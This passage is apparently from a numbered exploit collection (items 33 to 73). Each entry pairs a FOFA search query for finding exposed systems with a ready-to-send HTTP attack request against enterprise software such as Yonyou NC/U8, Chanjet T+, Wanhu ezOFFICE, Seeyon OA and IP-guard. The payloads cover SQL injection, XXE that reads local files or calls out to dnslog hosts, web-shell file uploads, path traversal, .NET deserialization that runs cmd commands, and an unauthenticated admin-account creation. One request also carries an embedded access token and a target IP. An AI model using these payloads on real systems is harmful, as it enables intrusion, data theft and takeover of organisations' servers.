Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 Social Commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the following request to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Baizhuo (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Ente (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate (优卡特) Lian'aiyun one-face-pass smart management platform 1.0.55.0.0.1 permission bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 has been created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the path it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
